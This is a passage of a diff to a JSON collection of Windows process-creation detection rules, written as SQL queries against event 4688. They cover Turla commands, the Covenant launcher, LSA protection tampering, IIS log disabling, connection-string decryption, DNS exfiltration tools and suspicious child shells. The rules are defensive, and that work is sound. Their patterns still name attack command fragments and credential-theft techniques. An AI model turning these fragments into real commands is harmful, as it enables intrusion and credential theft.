"attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ @@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND 